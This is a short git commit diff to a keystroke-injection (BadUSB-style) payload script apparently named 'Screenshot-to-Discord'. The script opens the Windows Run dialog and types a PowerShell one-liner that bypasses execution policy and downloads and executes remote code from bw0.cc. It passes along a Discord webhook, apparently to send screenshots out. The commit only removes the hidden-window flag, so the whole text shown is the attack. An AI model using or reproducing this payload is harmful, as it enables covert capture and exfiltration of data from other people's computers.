Update Screenshot-to-Discord.txt

This commit is contained in:
egieb
2025-06-20 11:03:52 +00:00
committed by GitHub
parent 0b9e325c61
commit c9b136f988

View File

@@ -15,7 +15,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcss)
STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcss)
ENTER